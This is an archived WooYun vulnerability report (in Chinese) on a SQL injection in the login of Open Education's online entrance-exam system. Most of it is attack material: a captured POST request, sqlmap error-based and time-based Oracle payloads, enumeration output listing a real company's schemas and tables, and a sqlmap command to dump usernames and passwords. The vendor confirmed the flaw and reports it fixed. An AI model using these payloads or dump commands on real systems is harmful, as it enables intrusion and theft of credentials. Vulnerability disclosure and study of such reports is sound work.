奥鹏教育某机考系统存在SQL注入漏洞

编号176322
Urlhttp://www.wooyun.org/bug.php?action=view&id=176322
漏洞状态厂商已经修复
漏洞标题奥鹏教育某机考系统存在SQL注入漏洞
漏洞类型SQL注射漏洞
厂商open.com.cn
白帽子指尖上的故事
提交日期2016-02-17 09:16:00
公开日期2016-02-18 13:56:00
修复时间2016-02-18 13:56:00
确认时间2016-02-17 00:00:00
Confirm Spend0
漏洞标签asp+sqlserver注射
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank18
漏洞简介
.....
漏洞细节

http://exam.open.com.cn/matriculationonline/login.asp 奥鹏教育远程教育中心--入学测试现考系统
登录处抓包:

POST /matriculationonline/authenticate.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://exam.open.com.cn/matriculationonline/login.asp
Content-Type: text/xml; charset=gb2312
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: exam.open.com.cn
Content-Length: 131
Pragma: no-cache
Cookie: ASPSESSIONIDASQCRADQ=EIPCOLIBGJNLCMPMHKDDNPEN
<?xml version="1.0" encoding="gb2312"?>
<LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>


存在POST注入....

POC

Place: POST
Parameter: Imp_userstat
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 1574=(SELE
CT UPPER(XMLType(CHR(60)||CHR(58)||CHR(105)||CHR(120)||CHR(101)||CHR(58)||(SELEC
T (CASE WHEN (1574=1574) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(1
08)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL)&imageField.x=23&imageField.y=10
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 9663=DBMS_
PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84)||CHR(78)||CHR(68),5)&imageField.x=23&image
Field.y=10
---
[04:15:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.4
back-end DBMS: Oracle
[04:15:40] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[04:15:40] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HAIHONG
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WSD
[*] XDB
跑一下WSD.....
[04:10:57] [INFO] retrieved: WSD
[04:10:58] [INFO] retrieved: PUB_ORDER
[04:10:58] [INFO] retrieved: WSD
[04:10:59] [INFO] retrieved: ZX_PUB_PROVINCE
[04:11:00] [INFO] retrieved: WSD
[04:11:00] [INFO] retrieved: ZX_UNT_SAL_APPLY_LOG
[04:11:01] [INFO] retrieved: WSD
[04:11:02] [INFO] retrieved: ZX_WLS_SAL_APPLY_GEN_LOG
[04:11:02] [INFO] retrieved: WSD
[04:11:03] [INFO] retrieved: YSJ_1
[04:11:04] [INFO] retrieved: WSD
[04:11:05] [INFO] retrieved: YSJ_USES
[04:11:05] [INFO] retrieved: WSD
[04:11:06] [INFO] retrieved: YSJ_GOODS
[04:11:07] [INFO] retrieved: WSD
[04:11:07] [INFO] retrieved: ZX_CUSTOM_CORPORATION
[04:11:08] [INFO] retrieved: WSD
[04:11:09] [INFO] retrieved: ZX_CUSTOM_ZZ_MYYJK
[04:11:09] [INFO] retrieved: WSD
[04:11:10] [INFO] retrieved: BMS_PR_CUSTOM
[04:11:11] [INFO] retrieved: WSD
[04:11:11] [INFO] retrieved: BMS_SA_DOC
[04:11:12] [INFO] retrieved: WSD
[04:11:13] [INFO] retrieved: BMS_SA_DTL
[04:11:14] [INFO] retrieved: WSD
[04:11:14] [INFO] retrieved: BMS_SA_INV_INFO
[04:11:15] [INFO] retrieved: WSD
[04:11:16] [INFO] retrieved: BMS_STORER_POS
[04:11:17] [INFO] retrieved: WSD
[04:11:18] [INFO] retrieved: BMS_ST_IO_DOC_TMP
[04:11:18] [INFO] retrieved: WSD
[04:11:19] [INFO] retrieved: BMS_ST_IO_DTL_TMP
[04:11:20] [INFO] retrieved: WSD
[04:11:20] [INFO] retrieved: BMS_TR_POS_DEF
[04:11:21] [INFO] retrieved: WSD
[04:11:22] [INFO] retrieved: BMS_LOT_DEF
Database: WSD
[138 tables]
+--------------------------------+
| BMS_GOODS_STATUS |
| BMS_LOT_DEF |
| BMS_PR_CUSTOM |
| BMS_SA_DOC |
| BMS_SA_DTL |
| BMS_SA_INV_INFO |
| BMS_STORER_POS |
| BMS_ST_DEF |
| BMS_ST_IO_DOC_TMP |
| BMS_ST_IO_DTL_TMP |
| BMS_ST_QTY_LST |
| BMS_TR_POS_DEF |
| DC2_COLLECTPOINT |
| DC2_COLLECTPOINT_DTL |
| DC2_COLUMN_INITVALUE |
| DC2_DATA |
| DC2_DATA_DTL |
| DC2_DBVERSION |
| DC2_ERROR_MANAGER |
| DC2_INFORMATION_BUFFER |
| DC2_LOG_TABLE |
| DC2_LOG_TABLE_COLUMN |
| DC2_LOG_VIEW |
| DC2_NODE |
| DC2_PROJECT_LOG |
| DC2_RESTORE_LOG |
| DC_BUF_000802980001 |
| DC_BUF_000812040001 |
| DC_BUF_000825240001 |
| DC_BUF_0009108F0001 |
| DC_BUF_000911FF0001 |
| DC_BUF_000952A60001 |
| DC_BUF_000C00180001 |
| DC_BUF_000D20AA0001 |
| DC_BUF_000F04320001 |
| DC_BUF_000F37940001 |
| DC_BUF_00113BCF0001 |
| DC_BUF_001301C30001 |
| DC_BUF_001304150001 |
| DC_BUF_001342600001 |
| DC_BUF_001513410001 |
| DC_BUF_0016096F0001 |
| DC_BUF_001621D90001 |
| DC_BUF_001706170001 |
| DC_BUF_00190E1D0001 |
| DC_BUF_001B02B70001 |
| DC_BUF_001D03BC0001 |
| DC_BUF_001D14020001 |
| DC_BUF_002201E60001 |
| DC_BUF_00220AC70001 |
| DC_BUF_00230D070001 |
| DC_BUF_002405930001 |
| DC_BUF_002533A20001 |
| DC_BUF_002707330001 |
| DC_BUF_00280B880001 |
| DC_BUF_002942C00001 |
| DC_BUF_002B026B0001 |
| DC_BUF_002D182C0001 |
| DC_BUF_003E06E00001 |
| LG_HIS |
| LG_IP |
| LOGIN_HISTORY |
| MICROSOFTDTPROPERTIES |
| NOUSE_GOOD |
| ORDER_IMPORT_TMP |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PHONE |
| PHONE_CUSTOM |
| PLAN_TABLE |
| PO_HEADER |
| PO_LINE_LOCATION |
| PRT_BMS_SA_WEBCON_DOC_BACK |
| PRT_BMS_SA_WEBCON_DTL_BACK |
| PUB_ADMIN |
| PUB_CUSTOMER |
| PUB_CUSTOM_SOURCE |
| PUB_CUSTOM_TO_SALER |
| PUB_CUSTOM_TO_SALER_BAK |
| PUB_DDL |
| PUB_EMPLOYEE |
| PUB_EMP_GOODS |
| PUB_FACTORY |
| PUB_GOODS |
| PUB_GOODS_PRICE |
| PUB_GOODS_VARTYPE |
| PUB_MOBILEPHONE |
| PUB_ORDER |
| PUB_PASSWORD |
| PUB_SALE |
| PUB_SMS_USER |
| PUB_SUPPLYER |
| TONGTIM_DATA |
| TONGTIM_MSG |
| TONGTIM_MSGSERVICE |
| TONGTIM_MSGTYPE |
| TONGTIM_MSG_BAK |
| TONGTIM_TRIGGER |
| UNT_SAL_APPLY |
| WLS_SAL_APPLY |
| XT_XLZZ_WSD |
| YSJ_1 |
| YSJ_GOODS |
| YSJ_TEMP |
| YSJ_TEMP1 |
| YSJ_USES |
| ZMH_SALE |
| ZMH_TEMP |
| ZX_BMS_COMPANY_GOODSCLASS |
| ZX_BMS_GOODS_PRICE |
| ZX_BMS_SA_CONNO_TICK |
| ZX_CUSTOM_CORPORATION |
| ZX_CUSTOM_HEALTHFOODPERMIT |
| ZX_CUSTOM_LEGAL_INDENTURE |
| ZX_CUSTOM_MEDDEVICEPERMIT_CLAS |
| ZX_CUSTOM_MEDDEVICESPERMIT |
| ZX_CUSTOM_MEDMASSPERMIT |
| ZX_CUSTOM_MEDORAPERMIT |
| ZX_CUSTOM_MEDPASSPERMIT |
| ZX_CUSTOM_MYBJJSFWZYXKZ |
| ZX_CUSTOM_SPLTXKZ |
| ZX_CUSTOM_ZZ_MYYJK |
| ZX_CUS_LEGALINDENTURE_CLS |
| ZX_GOODS_TR_POS_DEF |
| ZX_PUB_CITY |
| ZX_PUB_COUNTY |
| ZX_PUB_PROVINCE |
| ZX_SP_GOODS_CLASS |
| ZX_TIE_ZHENGZHAO_CHECKRULE |
| ZX_UNT_SAL_APPLY_LOG |
| ZX_WLS_SAL_APPLY_GEN_LOG |
| ZX_ZZ_CUSTOM_ANNALS |
| ZX_ZZ_FACTORY_ANNALS |
| ZX_ZZ_SUPPLY_ANNALS |
| ZZ_CONTROL_RULE |
+--------------------------------+


直接脱库看看
(sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)

1.png


dd.png


修复方案

状态信息 2016-02-17: 细节已通知厂商并且等待厂商处理中
2016-02-17: 厂商已经确认,细节仅向厂商公开
2016-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复已提交相关人员处理。-liu
回应信息危害等级:高漏洞Rank:18 确认时间:2016-02-17 10:28